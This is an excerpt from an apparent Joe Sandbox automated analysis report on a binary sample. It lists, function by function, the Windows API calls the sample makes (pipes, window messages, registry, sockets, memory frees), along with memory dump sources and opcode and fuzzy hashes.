                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 009505C6
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00950601
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    • Opcode ID: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
                                                                    • Instruction ID: 12fc06fd3aa649fd2e1b97493e6bc3199f18af0d9f9ab64dc5746a697c5bc928
                                                                    • Opcode Fuzzy Hash: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
                                                                    • Instruction Fuzzy Hash: 92217F75501306DBDB20DF6ADC04A9A77A8AFD5721F240B19FCA1E72E0E77099A4CB10
                                                                    APIs
                                                                      • Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                      • Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
                                                                      • Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00974112
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0097411F
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0097412A
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00974139
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00974145
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
                                                                    • Instruction ID: 02d5693dd89e56fadc5c5c715c428b7bd036dbeb72ceff6d6c288b99f9d65e89
                                                                    • Opcode Fuzzy Hash: 9ac833eb63b6e0dc05b55429b8b3c04c0d11acd3abbe8fd50bfb438e39095aef
                                                                    • Instruction Fuzzy Hash: 1511B2B2150219BEEF119F64CC86EE77F9DEF19798F108110BA18A2050C7729C61DBA4
                                                                    APIs
                                                                      • Part of subcall function 0091D7A3: _free.LIBCMT ref: 0091D7CC
                                                                    • _free.LIBCMT ref: 0091D82D
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • _free.LIBCMT ref: 0091D838
                                                                    • _free.LIBCMT ref: 0091D843
                                                                    • _free.LIBCMT ref: 0091D897
                                                                    • _free.LIBCMT ref: 0091D8A2
                                                                    • _free.LIBCMT ref: 0091D8AD
                                                                    • _free.LIBCMT ref: 0091D8B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                    • Instruction ID: ab4facfb0111765fd200093cf298ee1fe1f7371c4c785adedc0ab37f9f34c76f
                                                                    • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                    • Instruction Fuzzy Hash: 841151B1742B0CAAE521BFB0CC47FCB7BDC6F80710F440825B2A9AA0D2DAA5B5A54650
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0094DA74
                                                                    • LoadStringW.USER32(00000000), ref: 0094DA7B
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0094DA91
                                                                    • LoadStringW.USER32(00000000), ref: 0094DA98
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0094DADC
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0094DAB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 4072794657-3128320259
                                                                    • Opcode ID: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
                                                                    • Instruction ID: c536526b27fdda80524e64e7d168f72ad4419362845e3e0eb669d888de55c4f9
                                                                    • Opcode Fuzzy Hash: 2dfdd13105642c6ab940b2c679991d2dc8a4448d30d91366b726b05ab2dc033d
                                                                    • Instruction Fuzzy Hash: A70186F75142087FE711ABA09D89EEB376CE708705F4048A9B74AE2041EA749EC44F74
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(00BAE2C8,00BAE2C8), ref: 0095097B
                                                                    • EnterCriticalSection.KERNEL32(00BAE2A8,00000000), ref: 0095098D
                                                                    • TerminateThread.KERNEL32(00BAE2C0,000001F6), ref: 0095099B
                                                                    • WaitForSingleObject.KERNEL32(00BAE2C0,000003E8), ref: 009509A9
                                                                    • CloseHandle.KERNEL32(00BAE2C0), ref: 009509B8
                                                                    • InterlockedExchange.KERNEL32(00BAE2C8,000001F6), ref: 009509C8
                                                                    • LeaveCriticalSection.KERNEL32(00BAE2A8), ref: 009509CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
                                                                    • Instruction ID: 457a86b412d4248907f54e1a0d6081fe34ecf15e42338ca1c14c8f169d320dbd
                                                                    • Opcode Fuzzy Hash: af03f5f9ae3eb02609cb377bd125aeb69a1baa3a9915cbe70de8f771b97dd08f
                                                                    • Instruction Fuzzy Hash: BFF03C7345AA02FBD7415FA4EE8CBD6BB39FF41702F402029F206A08A5CB7494A5DF90
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 008E5D30
                                                                    • GetWindowRect.USER32(?,?), ref: 008E5D71
                                                                    • ScreenToClient.USER32(?,?), ref: 008E5D99
                                                                    • GetClientRect.USER32(?,?), ref: 008E5ED7
                                                                    • GetWindowRect.USER32(?,?), ref: 008E5EF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
                                                                    • Instruction ID: 87cb0efa76381a6e25c202ae2bc368f161c0389fdae34a9de208ed244c22318b
                                                                    • Opcode Fuzzy Hash: 26ee2146a9a4553fe30a1eadb9ad83756bd8b1e0735f318e5b137b436b583d31
                                                                    • Instruction Fuzzy Hash: 51B18A79A1078ADBDB10CFA9C4807EEB7F1FF48314F14841AE8A9D7254DB30AA51DB50
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 009100BA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009100D6
                                                                    • __allrem.LIBCMT ref: 009100ED
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091010B
                                                                    • __allrem.LIBCMT ref: 00910122
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00910140
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                    • Instruction ID: 7c64150170cccd4ed4189de3fe5c62580a5aa068b7a78526f9a2fdffcef3e5bf
                                                                    • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                    • Instruction Fuzzy Hash: 57811772B0070AAFE7209E28CC51BAB73E9EFC5360F24453AF551D66C1E7B5DA808750
                                                                    APIs
                                                                      • Part of subcall function 00963149: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00963195
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00961DC0
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00961DE1 (ordinal-only import, left unresolved by the report; wsock32.dll exports recvfrom at ordinal 17)
                                                                    • WSAGetLastError.WSOCK32 ref: 00961DF2
                                                                    • inet_ntoa.WSOCK32(?), ref: 00961E8C
                                                                    • htons.WSOCK32(?), ref: 00961EDB
                                                                    • _strlen.LIBCMT ref: 00961F35
                                                                      • Part of subcall function 009439E8: _strlen.LIBCMT ref: 009439F2
                                                                      • Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,008FCF58,?,?,?), ref: 008E6DBA
                                                                      • Part of subcall function 008E6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,008FCF58,?,?,?), ref: 008E6DED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                    • String ID:
                                                                    • API String ID: 1923757996-0
                                                                    • Opcode ID: 3a3e451691c22a7ed4dbdd8459ce36f9fd2261ddafaa7459c63a3299fd025ca7
                                                                    • Instruction ID: 1345c9e1f11e3d1d2567840eac34472984cf60414d3d9d5f9c32a995597fa259
                                                                    • Opcode Fuzzy Hash: 3a3e451691c22a7ed4dbdd8459ce36f9fd2261ddafaa7459c63a3299fd025ca7
                                                                    • Instruction Fuzzy Hash: CAA1DE31604340AFC324DB24C891F2A7BA9FF85318F58895CF5569B2A2DB71ED46CB92
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009082D9,009082D9,?,?,?,0091644F,00000001,00000001,8BE85006), ref: 00916258
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0091644F,00000001,00000001,8BE85006,?,?,?), ref: 009162DE
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009163D8
                                                                    • __freea.LIBCMT ref: 009163E5
                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    • __freea.LIBCMT ref: 009163EE
                                                                    • __freea.LIBCMT ref: 00916413
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
                                                                    • Instruction ID: d59937cd8795820d17efb63a7bd95e011a757d72e88c5ab40d8c6abb95f21a8b
                                                                    • Opcode Fuzzy Hash: 21b2fe8a54bdfe79b421b38279008c98e063344080a9064e24f89fb486ea9de8
                                                                    • Instruction Fuzzy Hash: CC51D072B0021AABDB258F64CD81FEF77AAEB84710F144629FC25D6180EB34DCC1D660
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 0096C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096B6AE,?,?), ref: 0096C9B5
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096C9F1
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA68
                                                                      • Part of subcall function 0096C998: _wcslen.LIBCMT ref: 0096CA9E
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096BCCA
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0096BD25
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0096BD6A
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0096BD99
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0096BDF3
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0096BDFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 1120388591-0
                                                                    • Opcode ID: f5e85af5a4d23d228b27aefb885c4c77192f151cef3849771099a4a598d49c43
                                                                    • Instruction ID: eb385b119c77282dc5fd08a1f3564f189b4dbd7737631328b1810175ab06d253
                                                                    • Opcode Fuzzy Hash: f5e85af5a4d23d228b27aefb885c4c77192f151cef3849771099a4a598d49c43
                                                                    • Instruction Fuzzy Hash: 2C81C571108241EFC714DF24C895E2ABBE9FF85308F14895CF5998B2A2DB31ED85CB92
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000035), ref: 0093F7B9
                                                                    • SysAllocString.OLEAUT32(00000001), ref: 0093F860
                                                                    • VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F889
                                                                    • VariantClear.OLEAUT32(0093FA64), ref: 0093F8AD
                                                                    • VariantCopy.OLEAUT32(0093FA64,00000000), ref: 0093F8B1
                                                                    • VariantClear.OLEAUT32(?), ref: 0093F8BB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                    • String ID:
                                                                    • API String ID: 3859894641-0
                                                                    • Opcode ID: f6bec7bbde4cf054dc0293fa8504911f45d7b3d669a1356e5f9e0d6a92a803d0
                                                                    • Instruction ID: f77f793b7949d5ce79ea7c1bed083cf8a6ef8e93697ccec1d2727dea721222a3
                                                                    • Opcode Fuzzy Hash: f6bec7bbde4cf054dc0293fa8504911f45d7b3d669a1356e5f9e0d6a92a803d0
                                                                    • Instruction Fuzzy Hash: D551B735D10314BBCF24AB65D8A5B29B3A9EF45310F245866F906DF292DB748C40CF57
                                                                    APIs
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 009594E5
                                                                    • _wcslen.LIBCMT ref: 00959506
                                                                    • _wcslen.LIBCMT ref: 0095952D
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00959585
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                    • String ID: X
                                                                    • API String ID: 83654149-3081909835
                                                                    • Opcode ID: e49b2e3c79609ae100fd6913abbbde6385c40eef0eed0db4373f2fbdf6c2678f
                                                                    • Instruction ID: d0da13c3cef5ed4a145fd7bb3d36c8534339a0a56cf8258cc69c17d3f6bc3def
                                                                    • Opcode Fuzzy Hash: e49b2e3c79609ae100fd6913abbbde6385c40eef0eed0db4373f2fbdf6c2678f
                                                                    • Instruction Fuzzy Hash: E9E1B431508340DFD724DF2AC881A6AB7E4FF85314F14896DF9999B2A2EB31DD05CB92
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • BeginPaint.USER32(?,?,?), ref: 008F9241
                                                                    • GetWindowRect.USER32(?,?), ref: 008F92A5
                                                                    • ScreenToClient.USER32(?,?), ref: 008F92C2
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008F92D3
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 008F9321
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009371EA
                                                                      • Part of subcall function 008F9339: BeginPath.GDI32(00000000), ref: 008F9357
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 3050599898-0
                                                                    • Opcode ID: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
                                                                    • Instruction ID: e0541d7262a516236dae80a99eeddea3a21cd3b256dc53b04c8cb829e7b05b4e
                                                                    • Opcode Fuzzy Hash: aae24785eb7ec7d236c79107292aa075392c7cd75f6a188475ccc6ad2ea448b8
                                                                    • Instruction Fuzzy Hash: 1941B071118305AFD721DF64DCD4FBA7BA8FB55324F140229FAA8C72A1C7319885EB62
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0095080C
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00950847
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00950863
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 009508DC
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009508F3
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00950921
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3368777196-0
                                                                    • Opcode ID: 546e272b3b007a450fcc76e5ea8ef87144378350ed80153542909df34de0cff4
                                                                    • Instruction ID: b28a9064e09458fa08cdd7fc83f6d573c741a82804dd8ffa3743faa6134aaa4c
                                                                    • Opcode Fuzzy Hash: 546e272b3b007a450fcc76e5ea8ef87144378350ed80153542909df34de0cff4
                                                                    • Instruction Fuzzy Hash: 01414871900209EBDF14EF65DC85A6A77B8FF44310F1440A9EE04AE29BDB31DE65DBA0
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0093F3AB,00000000,?,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0097824C
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00978272
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 009782D1
                                                                    • ShowWindow.USER32(00000000,00000004), ref: 009782E5
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0097830B
